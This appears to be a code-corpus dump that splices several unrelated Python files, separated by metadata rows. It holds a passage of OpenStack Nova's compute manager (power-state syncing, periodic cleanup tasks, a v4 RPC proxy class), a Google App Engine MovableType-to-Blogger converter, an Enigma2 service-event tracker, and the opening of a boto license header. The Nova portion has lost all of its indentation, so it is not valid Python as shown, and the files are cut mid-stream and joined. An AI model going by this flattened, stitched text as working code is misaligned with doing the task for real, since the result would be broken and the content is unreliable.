'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# Note(maoy): here we call the API instead of
# brutally updating the vm_state in the database
# to allow all the hooks and checks to be performed.
if db_instance.shutdown_terminate:
self.compute_api.delete(context, db_instance)
else:
self.compute_api.stop(context, db_instance)
except Exception:
# Note(maoy): there is no need to propagate the error
# because the same power_state will be retrieved next
# time and retried.
# For example, there might be another task scheduled.
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.SUSPENDED:
LOG.warning(_LW("Instance is suspended unexpectedly. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.PAUSED:
# Note(maoy): a VM may get into the paused state not only
# because the user request via API calls, but also
# due to (temporary) external instrumentations.
# Before the virt layer can reliably report the reason,
# we simply ignore the state discrepancy. In many cases,
# the VM state will go back to running after the external
# instrumentation is done. See bug 1097806 for details.
LOG.warning(_LW("Instance is paused unexpectedly. Ignore."),
instance=db_instance)
elif vm_power_state == power_state.NOSTATE:
# Occasionally, depending on the status of the hypervisor,
# which could be restarting for example, an instance may
# not be found. Therefore just log the condition.
LOG.warning(_LW("Instance is unexpectedly not found. Ignore."),
instance=db_instance)
elif vm_state == vm_states.STOPPED:
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance is not stopped. Calling "
"the stop API. Current vm_state: %(vm_state)s,"
" current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# NOTE(russellb) Force the stop, because normally the
# compute API would not allow an attempt to stop a stopped
# instance.
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state == vm_states.PAUSED:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Paused instance shutdown by itself. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state in (vm_states.SOFT_DELETED,
vm_states.DELETED):
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN):
# Note(maoy): this should be taken care of periodically in
# _cleanup_running_deleted_instances().
LOG.warning(_LW("Instance is not (soft-)deleted."),
instance=db_instance)
@periodic_task.periodic_task
def _reclaim_queued_deletes(self, context):
"""Reclaim instances that are queued for deletion."""
interval = CONF.reclaim_instance_interval
if interval <= 0:
LOG.debug("CONF.reclaim_instance_interval <= 0, skipping...")
return
        # TODO(comstud, jichenjc): Dummy quota object for now. See bug 1296414.
        # The only case where the quota might be inconsistent is if the
        # compute node died between setting the instance state to
        # SOFT_DELETED and committing the quota to the DB. When the compute
        # node starts again it has no idea whether the reservation was
        # committed or has expired; since this is a rare case it is marked
        # as a todo.
quotas = objects.Quotas.from_reservations(context, None)
filters = {'vm_state': vm_states.SOFT_DELETED,
'task_state': None,
'host': self.host}
instances = objects.InstanceList.get_by_filters(
context, filters,
expected_attrs=objects.instance.INSTANCE_DEFAULT_FIELDS,
use_slave=True)
for instance in instances:
if self._deleted_old_enough(instance, interval):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
LOG.info(_LI('Reclaiming deleted instance'), instance=instance)
try:
self._delete_instance(context, instance, bdms, quotas)
except Exception as e:
LOG.warning(_LW("Periodic reclaim failed to delete "
"instance: %s"),
e, instance=instance)
@periodic_task.periodic_task
def update_available_resource(self, context):
"""See driver.get_available_resource()
        Periodic process that keeps the compute host's understanding of
resource availability and usage in sync with the underlying hypervisor.
:param context: security context
"""
new_resource_tracker_dict = {}
nodenames = set(self.driver.get_available_nodes())
for nodename in nodenames:
rt = self._get_resource_tracker(nodename)
rt.update_available_resource(context)
new_resource_tracker_dict[nodename] = rt
# Delete orphan compute node not reported by driver but still in db
compute_nodes_in_db = self._get_compute_nodes_in_db(context,
use_slave=True)
for cn in compute_nodes_in_db:
if cn.hypervisor_hostname not in nodenames:
LOG.info(_LI("Deleting orphan compute node %s") % cn.id)
cn.destroy()
self._resource_tracker_dict = new_resource_tracker_dict
def _get_compute_nodes_in_db(self, context, use_slave=False):
try:
return objects.ComputeNodeList.get_all_by_host(context, self.host,
use_slave=use_slave)
except exception.NotFound:
LOG.error(_LE("No compute node record for host %s"), self.host)
return []
@periodic_task.periodic_task(
spacing=CONF.running_deleted_instance_poll_interval)
def _cleanup_running_deleted_instances(self, context):
"""Cleanup any instances which are erroneously still running after
having been deleted.
Valid actions to take are:
1. noop - do nothing
2. log - log which instances are erroneously running
3. reap - shutdown and cleanup any erroneously running instances
4. shutdown - power off *and disable* any erroneously running
instances
The use-case for this cleanup task is: for various reasons, it may be
possible for the database to show an instance as deleted but for that
instance to still be running on a host machine (see bug
https://bugs.launchpad.net/nova/+bug/911366).
This cleanup task is a cross-hypervisor utility for finding these
zombied instances and either logging the discrepancy (likely what you
should do in production), or automatically reaping the instances (more
appropriate for dev environments).
"""
action = CONF.running_deleted_instance_action
if action == "noop":
return
# NOTE(sirp): admin contexts don't ordinarily return deleted records
with utils.temporary_mutation(context, read_deleted="yes"):
for instance in self._running_deleted_instances(context):
if action == "log":
LOG.warning(_LW("Detected instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
elif action == 'shutdown':
LOG.info(_LI("Powering off instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
try:
try:
# disable starting the instance
self.driver.set_bootable(instance, False)
except NotImplementedError:
LOG.warning(_LW("set_bootable is not implemented "
"for the current driver"))
# and power it off
self.driver.power_off(instance)
except Exception:
msg = _LW("Failed to power off instance")
LOG.warn(msg, instance=instance, exc_info=True)
elif action == 'reap':
LOG.info(_LI("Destroying instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=True)
self.instance_events.clear_events_for_instance(instance)
try:
self._shutdown_instance(context, instance, bdms,
notify=False)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception as e:
LOG.warning(_LW("Periodic cleanup failed to delete "
"instance: %s"),
e, instance=instance)
else:
raise Exception(_("Unrecognized value '%s'"
" for CONF.running_deleted_"
"instance_action") % action)
def _running_deleted_instances(self, context):
"""Returns a list of instances nova thinks is deleted,
but the hypervisor thinks is still running.
"""
timeout = CONF.running_deleted_instance_timeout
filters = {'deleted': True,
'soft_deleted': False,
'host': self.host}
instances = self._get_instances_on_driver(context, filters)
return [i for i in instances if self._deleted_old_enough(i, timeout)]
def _deleted_old_enough(self, instance, timeout):
deleted_at = instance['deleted_at']
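        # NovaObject datetimes are timezone-aware; strip tzinfo so the value
        # can be compared with the naive UTC datetimes that
        # timeutils.is_older_than works with.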
if isinstance(instance, obj_base.NovaObject) and deleted_at:
deleted_at = deleted_at.replace(tzinfo=None)
return (not deleted_at or timeutils.is_older_than(deleted_at, timeout))
@contextlib.contextmanager
def _error_out_instance_on_exception(self, context, instance,
quotas=None,
instance_state=vm_states.ACTIVE):
instance_uuid = instance.uuid
try:
yield
except NotImplementedError as error:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to %(state)s after: "
"%(error)s"),
{'state': instance_state, 'error': error},
instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=instance_state,
task_state=None)
except exception.InstanceFaultRollback as error:
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to ACTIVE after: %s"),
error, instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=vm_states.ACTIVE,
task_state=None)
raise error.inner_exception
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance_uuid=instance_uuid)
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
self._set_instance_error_state(context, instance)
@aggregate_object_compat
@wrap_exception()
def add_aggregate_host(self, context, aggregate, host, slave_info):
"""Notify hypervisor of change (for hypervisor pools)."""
try:
self.driver.add_to_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'add_aggregate_host')
except exception.AggregateError:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.delete_host,
aggregate, host)
@aggregate_object_compat
@wrap_exception()
def remove_aggregate_host(self, context, host, slave_info, aggregate):
"""Removes a host from a physical hypervisor pool."""
try:
self.driver.remove_from_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'remove_aggregate_host')
except (exception.AggregateError,
exception.InvalidAggregateAction) as e:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.add_host,
aggregate, host,
isinstance(e, exception.AggregateError))
def _process_instance_event(self, instance, event):
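        # Pop the event object a waiting thread registered for this
        # instance, if any; sending on it unblocks that waiter.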
_event = self.instance_events.pop_instance_event(instance, event)
if _event:
LOG.debug('Processing event %(event)s',
{'event': event.key}, instance=instance)
_event.send(event)
@wrap_exception()
def external_instance_event(self, context, instances, events):
# NOTE(danms): Some event types are handled by the manager, such
# as when we're asked to update the instance's info_cache. If it's
# not one of those, look for some thread(s) waiting for the event and
# unblock them if so.
for event in events:
instance = [inst for inst in instances
if inst.uuid == event.instance_uuid][0]
LOG.debug('Received event %(event)s',
{'event': event.key},
instance=instance)
if event.name == 'network-changed':
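                # Refreshing the instance's network info cache is the
                # desired side effect here; the return value is not used.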
self.network_api.get_instance_nw_info(context, instance)
else:
self._process_instance_event(instance, event)
@periodic_task.periodic_task(spacing=CONF.image_cache_manager_interval,
external_process_ok=True)
def _run_image_cache_manager_pass(self, context):
"""Run a single pass of the image cache manager."""
if not self.driver.capabilities["has_imagecache"]:
return
# Determine what other nodes use this storage
storage_users.register_storage_use(CONF.instances_path, CONF.host)
nodes = storage_users.get_storage_users(CONF.instances_path)
# Filter all_instances to only include those nodes which share this
# storage path.
# TODO(mikal): this should be further refactored so that the cache
# cleanup code doesn't know what those instances are, just a remote
# count, and then this logic should be pushed up the stack.
filters = {'deleted': False,
'soft_deleted': True,
'host': nodes}
filtered_instances = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
self.driver.manage_image_cache(context, filtered_instances)
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _run_pending_deletes(self, context):
"""Retry any pending instance file deletes."""
LOG.debug('Cleaning up deleted instances')
filters = {'deleted': True,
'soft_deleted': False,
'host': CONF.host,
'cleaned': False}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=attrs, use_slave=True)
LOG.debug('There are %d instances to clean', len(instances))
for instance in instances:
attempts = int(instance.system_metadata.get('clean_attempts', '0'))
LOG.debug('Instance has had %(attempts)s of %(max)s '
'cleanup attempts',
{'attempts': attempts,
'max': CONF.maximum_instance_delete_attempts},
instance=instance)
if attempts < CONF.maximum_instance_delete_attempts:
success = self.driver.delete_instance_files(instance)
instance.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
instance.cleaned = True
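                # The instance row is already marked deleted, so the save
                # must run with read_deleted='yes' to find it.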
with utils.temporary_mutation(context, read_deleted='yes'):
instance.save()
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _cleanup_incomplete_migrations(self, context):
"""Delete instance files on failed resize/revert-resize operation
        During a resize/revert-resize operation, if the instance gets deleted
        in between, its files might remain on either the source or
        destination compute node because of a race condition.
"""
        LOG.debug('Cleaning up deleted instances with incomplete migration')
migration_filters = {'host': CONF.host,
'status': 'error'}
migrations = objects.MigrationList.get_by_filters(context,
migration_filters)
if not migrations:
return
inst_uuid_from_migrations = set([migration.instance_uuid for migration
in migrations])
inst_filters = {'deleted': True, 'soft_deleted': False,
'uuid': inst_uuid_from_migrations}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, inst_filters, expected_attrs=attrs, use_slave=True)
for instance in instances:
if instance.host != CONF.host:
for migration in migrations:
if instance.uuid == migration.instance_uuid:
                        # Delete instance files if they were not cleaned up
                        # properly on either the source or destination compute
                        # node when the instance was deleted during resizing.
self.driver.delete_instance_files(instance)
try:
migration.status = 'failed'
with migration.obj_as_admin():
migration.save()
except exception.MigrationNotFound:
LOG.warning(_LW("Migration %s is not found."),
migration.id, context=context,
instance=instance)
break
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def quiesce_instance(self, context, instance):
"""Quiesce an instance on this host."""
context = context.elevated()
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.quiesce(context, instance, image_meta)
def _wait_for_snapshots_completion(self, context, mapping):
for mapping_dict in mapping:
if mapping_dict.get('source_type') == 'snapshot':
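                # Poll Cinder until the snapshot leaves the 'creating'
                # state; raising LoopingCallDone stops the fixed-interval
                # loop started below.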
def _wait_snapshot():
snapshot = self.volume_api.get_snapshot(
context, mapping_dict['snapshot_id'])
if snapshot.get('status') != 'creating':
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_snapshot)
timer.start(interval=0.5).wait()
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def unquiesce_instance(self, context, instance, mapping=None):
"""Unquiesce an instance on this host.
If snapshots' image mapping is provided, it waits until snapshots are
        completed before unquiescing.
"""
context = context.elevated()
if mapping:
try:
self._wait_for_snapshots_completion(context, mapping)
except Exception as error:
LOG.exception(_LE("Exception while waiting completion of "
"volume snapshots: %s"),
error, instance=instance)
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.unquiesce(context, instance, image_meta)
# TODO(danms): This goes away immediately in Lemming and is just
# present in Kilo so that we can receive v3.x and v4.0 messages
class _ComputeV4Proxy(object):
target = messaging.Target(version='4.0')
def __init__(self, manager):
self.manager = manager
def add_aggregate_host(self, ctxt, aggregate, host, slave_info=None):
return self.manager.add_aggregate_host(ctxt, aggregate, host,
slave_info=slave_info)
def add_fixed_ip_to_instance(self, ctxt, network_id, instance):
return self.manager.add_fixed_ip_to_instance(ctxt,
network_id,
instance)
def attach_interface(self, ctxt, instance, network_id, port_id,
requested_ip):
return self.manager.attach_interface(ctxt, instance, network_id,
port_id, requested_ip)
def attach_volume(self, ctxt, instance, bdm):
# NOTE(danms): In 3.x, attach_volume had mountpoint and volume_id
# parameters, which are gone from 4.x. Provide None for each to
# the 3.x manager above and remove in Lemming.
return self.manager.attach_volume(ctxt, None, None,
instance=instance,
bdm=bdm)
def change_instance_metadata(self, ctxt, instance, diff):
return self.manager.change_instance_metadata(
ctxt, diff=diff, instance=instance)
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
return self.manager.check_can_live_migrate_destination(
ctxt, instance, block_migration, disk_over_commit)
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
return self.manager.check_can_live_migrate_source(ctxt, instance,
dest_check_data)
def check_instance_shared_storage(self, ctxt, instance, data):
return self.manager.check_instance_shared_storage(ctxt, instance, data)
def confirm_resize(self, ctxt, instance, reservations, migration):
return self.manager.confirm_resize(ctxt, instance,
reservations, migration)
def detach_interface(self, ctxt, instance, port_id):
return self.manager.detach_interface(ctxt, instance, port_id)
def detach_volume(self, ctxt, volume_id, instance):
# NOTE(danms): Pass instance by kwarg to help the object_compat
# decorator, as real RPC dispatch does.
return self.manager.detach_volume(ctxt, volume_id, instance=instance)
def finish_resize(self, ctxt, disk_info, image, instance,
reservations, migration):
return self.manager.finish_resize(ctxt, disk_info, image, instance,
reservations, migration)
def finish_revert_resize(self, ctxt, instance,
reservations, migration):
return self.manager.finish_revert_resize(ctxt, instance,
reservations, migration)
def get_console_output(self, ctxt, instance, tail_length):
return self.manager.get_console_output(ctxt, instance, tail_length)
def get_console_pool_info(self, ctxt, console_type):
return self.manager.get_console_pool_info(ctxt, console_type)
def get_console_topic(self, ctxt):
return self.manager.get_console_topic(ctxt)
def get_diagnostics(self, ctxt, instance):
return self.manager.get_diagnostics(ctxt, instance)
def get_instance_diagnostics(self, ctxt, instance):
return self.manager.get_instance_diagnostics(ctxt, instance)
def get_vnc_console(self, ctxt, console_type, instance):
return self.manager.get_vnc_console(ctxt, console_type, instance)
def get_spice_console(self, ctxt, console_type, instance):
return self.manager.get_spice_console(ctxt, console_type, instance)
def get_rdp_console(self, ctxt, console_type, instance):
return self.manager.get_rdp_console(ctxt, console_type, instance)
def get_serial_console(self, ctxt, console_type, instance):
return self.manager.get_serial_console(ctxt, console_type, instance)
def validate_console_port(self, ctxt, instance, port, console_type):
return self.manager.validate_console_port(ctxt, instance, port,
console_type)
def host_maintenance_mode(self, ctxt, host, mode):
return self.manager.host_maintenance_mode(ctxt, host, mode)
def host_power_action(self, ctxt, action):
return self.manager.host_power_action(ctxt, action)
def inject_network_info(self, ctxt, instance):
return self.manager.inject_network_info(ctxt, instance)
def live_migration(self, ctxt, dest, instance, block_migration,
migrate_data=None):
return self.manager.live_migration(ctxt, dest, instance,
block_migration,
migrate_data=migrate_data)
def pause_instance(self, ctxt, instance):
return self.manager.pause_instance(ctxt, instance)
def post_live_migration_at_destination(self, ctxt, instance,
block_migration):
return self.manager.post_live_migration_at_destination(
ctxt, instance, block_migration)
def pre_live_migration(self, ctxt, instance, block_migration, disk,
migrate_data=None):
return self.manager.pre_live_migration(ctxt, instance, block_migration,
disk, migrate_data=migrate_data)
def prep_resize(self, ctxt, image, instance, instance_type,
reservations=None, request_spec=None,
filter_properties=None, node=None, clean_shutdown=True):
return self.manager.prep_resize(ctxt, image, instance, instance_type,
reservations=reservations,
request_spec=request_spec,
filter_properties=filter_properties,
node=node,
clean_shutdown=clean_shutdown)
def reboot_instance(self, ctxt, instance, block_device_info, reboot_type):
return self.manager.reboot_instance(ctxt, instance, block_device_info,
reboot_type)
def rebuild_instance(self, ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
return self.manager.rebuild_instance(
ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=preserve_ephemeral)
def refresh_security_group_rules(self, ctxt, security_group_id):
return self.manager.refresh_security_group_rules(ctxt,
security_group_id)
def refresh_security_group_members(self, ctxt, security_group_id):
return self.manager.refresh_security_group_members(ctxt,
security_group_id)
def refresh_instance_security_rules(self, ctxt, instance):
return self.manager.refresh_instance_security_rules(ctxt, instance)
def refresh_provider_fw_rules(self, ctxt):
return self.manager.refresh_provider_fw_rules(ctxt)
def remove_aggregate_host(self, ctxt, host, slave_info, aggregate):
return self.manager.remove_aggregate_host(ctxt,
host, slave_info,
aggregate)
def remove_fixed_ip_from_instance(self, ctxt, address, instance):
return self.manager.remove_fixed_ip_from_instance(ctxt, address,
instance)
def remove_volume_connection(self, ctxt, instance, volume_id):
return self.manager.remove_volume_connection(ctxt, instance, volume_id)
def rescue_instance(self, ctxt, instance, rescue_password,
rescue_image_ref, clean_shutdown):
return self.manager.rescue_instance(ctxt, instance, rescue_password,
rescue_image_ref=rescue_image_ref,
clean_shutdown=clean_shutdown)
def reset_network(self, ctxt, instance):
return self.manager.reset_network(ctxt, instance)
def resize_instance(self, ctxt, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
return self.manager.resize_instance(ctxt, instance, image,
reservations, migration,
instance_type,
clean_shutdown=clean_shutdown)
def resume_instance(self, ctxt, instance):
return self.manager.resume_instance(ctxt, instance)
def revert_resize(self, ctxt, instance, migration, reservations=None):
return self.manager.revert_resize(ctxt, instance, migration,
reservations=reservations)
def rollback_live_migration_at_destination(self, ctxt, instance,
destroy_disks,
migrate_data):
return self.manager.rollback_live_migration_at_destination(
ctxt, instance, destroy_disks=destroy_disks,
migrate_data=migrate_data)
def set_admin_password(self, ctxt, instance, new_pass):
return self.manager.set_admin_password(ctxt, instance, new_pass)
def set_host_enabled(self, ctxt, enabled):
return self.manager.set_host_enabled(ctxt, enabled)
def swap_volume(self, ctxt, instance, old_volume_id, new_volume_id):
return self.manager.swap_volume(ctxt, old_volume_id, new_volume_id,
instance)
def get_host_uptime(self, ctxt):
return self.manager.get_host_uptime(ctxt)
def reserve_block_device_name(self, ctxt, instance, device, volume_id,
disk_bus=None, device_type=None):
return self.manager.reserve_block_device_name(ctxt, instance, device,
volume_id,
disk_bus=disk_bus,
device_type=device_type,
return_bdm_object=True)
def backup_instance(self, ctxt, image_id, instance, backup_type,
rotation):
return self.manager.backup_instance(ctxt, image_id, instance,
backup_type, rotation)
def snapshot_instance(self, ctxt, image_id, instance):
return self.manager.snapshot_instance(ctxt, image_id, instance)
def start_instance(self, ctxt, instance):
return self.manager.start_instance(ctxt, instance)
def stop_instance(self, ctxt, instance, clean_shutdown):
return self.manager.stop_instance(ctxt, instance, clean_shutdown)
def suspend_instance(self, ctxt, instance):
return self.manager.suspend_instance(ctxt, instance)
def terminate_instance(self, ctxt, instance, bdms, reservations=None):
return self.manager.terminate_instance(ctxt, instance, bdms,
reservations=reservations)
def unpause_instance(self, ctxt, instance):
return self.manager.unpause_instance(ctxt, instance)
def unrescue_instance(self, ctxt, instance):
return self.manager.unrescue_instance(ctxt, instance)
def soft_delete_instance(self, ctxt, instance, reservations):
return self.manager.soft_delete_instance(ctxt, instance, reservations)
def restore_instance(self, ctxt, instance):
return self.manager.restore_instance(ctxt, instance)
def shelve_instance(self, ctxt, instance, image_id=None,
clean_shutdown=True):
return self.manager.shelve_instance(ctxt, instance, image_id=image_id,
clean_shutdown=clean_shutdown)
def shelve_offload_instance(self, ctxt, instance, clean_shutdown):
return self.manager.shelve_offload_instance(ctxt, instance,
clean_shutdown)
def unshelve_instance(self, ctxt, instance, image=None,
filter_properties=None, node=None):
return self.manager.unshelve_instance(
ctxt, instance, image=image,
filter_properties=filter_properties,
node=node)
def volume_snapshot_create(self, ctxt, instance, volume_id, create_info):
return self.manager.volume_snapshot_create(ctxt, instance, volume_id,
create_info)
def volume_snapshot_delete(self, ctxt, instance, volume_id, snapshot_id,
delete_info):
return self.manager.volume_snapshot_delete(ctxt, instance, volume_id,
snapshot_id, delete_info)
def external_instance_event(self, ctxt, instances, events):
return self.manager.external_instance_event(ctxt, instances, events)
def build_and_run_instance(self, ctxt, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
return self.manager.build_and_run_instance(
ctxt, instance, image, request_spec, filter_properties,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
node=node, limits=limits)
def quiesce_instance(self, ctxt, instance):
return self.manager.quiesce_instance(ctxt, instance)
def unquiesce_instance(self, ctxt, instance, mapping=None):
return self.manager.unquiesce_instance(ctxt, instance, mapping=mapping)
| apache-2.0 | -2,871,954,071,504,506,400 | -5,514,878,904,892,532,000 | 45.071846 | 79 | 0.559565 | false |
tectronics/google-blog-converters-appengine | src/movabletype2blogger/movabletype2blogger.py | 30 | 2023 | #!/usr/bin/env python
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import traceback
import StringIO
import gdata.service
import gdata.urlfetch
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import mt2b
import wsgiref.handlers
__author__ = 'JJ Lueck ([email protected])'
# Use urlfetch instead of httplib
gdata.service.http_request_handler = gdata.urlfetch
class TransformPage(webapp.RequestHandler):
def post(self):
# All input/output will be in UTF-8
self.response.charset = 'utf8'
# Parse the mulit-part form-data part out of the POST
input = self.request.get('input-file', allow_multiple=False)
# Run the blogger import processor
translator = mt2b.MovableType2Blogger()
try:
translator.Translate(StringIO.StringIO(input), self.response.out)
self.response.content_type = 'application/atom+xml'
self.response.headers['Content-Disposition'] = \
'attachment;filename=blogger-export.xml'
except:
# Just provide an error message to the user.
self.response.content_type = 'text/plain'
self.response.out.write("Error encountered during conversion.<br/><br/>")
exc = traceback.format_exc()
self.response.out.write(exc.replace('\n', '<br/>'))
application = webapp.WSGIApplication([('/mt2b/', TransformPage)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
| apache-2.0 | -782,071,185,425,581,400 | -1,073,315,678,656,401,400 | 30.609375 | 79 | 0.71132 | false |
popazerty/try | lib/python/Components/ServiceEventTracker.py | 10 | 4229 | InfoBarCount = 0
class InfoBarBase:
onInfoBarOpened = [ ]
onInfoBarClosed = [ ]
@staticmethod
def connectInfoBarOpened(fnc):
if not fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.append(fnc)
@staticmethod
def disconnectInfoBarOpened(fnc):
if fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.remove(fnc)
@staticmethod
def infoBarOpened(infobar):
for x in InfoBarBase.onInfoBarOpened:
x(infobar)
@staticmethod
def connectInfoBarClosed(fnc):
if not fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.append(fnc)
@staticmethod
def disconnectInfoBarClosed(fnc):
if fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.remove(fnc)
@staticmethod
def infoBarClosed(infobar):
for x in InfoBarBase.onInfoBarClosed:
x(infobar)
def __init__(self, steal_current_service = False):
if steal_current_service:
ServiceEventTracker.setActiveInfoBar(self, None, None)
else:
nav = self.session.nav
ServiceEventTracker.setActiveInfoBar(self, not steal_current_service and nav.getCurrentService(), nav.getCurrentlyPlayingServiceOrGroup())
self.onClose.append(self.__close)
InfoBarBase.infoBarOpened(self)
global InfoBarCount
InfoBarCount += 1
def __close(self):
ServiceEventTracker.popActiveInfoBar()
InfoBarBase.infoBarClosed(self)
global InfoBarCount
InfoBarCount -= 1
class ServiceEventTracker:
"""Tracks service events into a screen"""
InfoBarStack = [ ]
InfoBarStackSize = 0
oldServiceStr = None
EventMap = { }
navcore = None
@staticmethod
def event(evt):
set = ServiceEventTracker
func_list = set.EventMap.setdefault(evt, [])
if func_list:
nav = set.navcore
cur_ref = nav.getCurrentlyPlayingServiceOrGroup()
try:
old_service_running = set.oldRef and cur_ref and cur_ref == set.oldRef and set.oldServiceStr == nav.getCurrentService().getPtrString()
except:
old_service_running = None
if not old_service_running and set.oldServiceStr:
set.oldServiceStr = None
set.oldRef = None
ssize = set.InfoBarStackSize
stack = set.InfoBarStack
for func in func_list:
if (func[0] or # let pass all events to screens not derived from InfoBarBase
(not old_service_running and stack[ssize-1] == func[1]) or # let pass events from currently running service just to current active screen (derived from InfoBarBase)
(old_service_running and ssize > 1 and stack[ssize-2] == func[1])): # let pass events from old running service just to previous active screen (derived from InfoBarBase)
func[2]()
@staticmethod
def setActiveInfoBar(infobar, old_service, old_ref):
set = ServiceEventTracker
set.oldRef = old_ref
set.oldServiceStr = old_service and old_service.getPtrString()
assert infobar not in set.InfoBarStack, "FATAL: Infobar '" + str(infobar) + "' is already active!"
set.InfoBarStack.append(infobar)
set.InfoBarStackSize += 1
# print "ServiceEventTracker set active '" + str(infobar) + "'"
@staticmethod
def popActiveInfoBar():
set = ServiceEventTracker
stack = set.InfoBarStack
if set.InfoBarStackSize:
nav = set.navcore
set.InfoBarStackSize -= 1
del stack[set.InfoBarStackSize]
old_service = nav.getCurrentService()
set.oldServiceStr = old_service and old_service.getPtrString()
set.oldRef = nav.getCurrentlyPlayingServiceOrGroup()
# if set.InfoBarStackSize:
# print "ServiceEventTracker reset active '" + str(stack[set.InfoBarStackSize-1]) + "'"
def __init__(self, screen, eventmap):
self.__screen = screen
self.__eventmap = eventmap
self.__passall = not isinstance(screen, InfoBarBase) # let pass all events to screens not derived from InfoBarBase
EventMap = ServiceEventTracker.EventMap
if not len(EventMap):
screen.session.nav.event.append(ServiceEventTracker.event)
ServiceEventTracker.navcore = screen.session.nav
EventMap = EventMap.setdefault
for x in eventmap.iteritems():
EventMap(x[0], []).append((self.__passall, screen, x[1]))
screen.onClose.append(self.__del_event)
def __del_event(self):
EventMap = ServiceEventTracker.EventMap.setdefault
for x in self.__eventmap.iteritems():
EventMap(x[0], []).remove((self.__passall, self.__screen, x[1]))
| gpl-2.0 | 884,084,976,387,787,900 | -628,201,075,888,394,100 | 32.563492 | 173 | 0.740837 | false |
abridgett/boto | boto/sqs/attributes.py | 223 | 1718 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
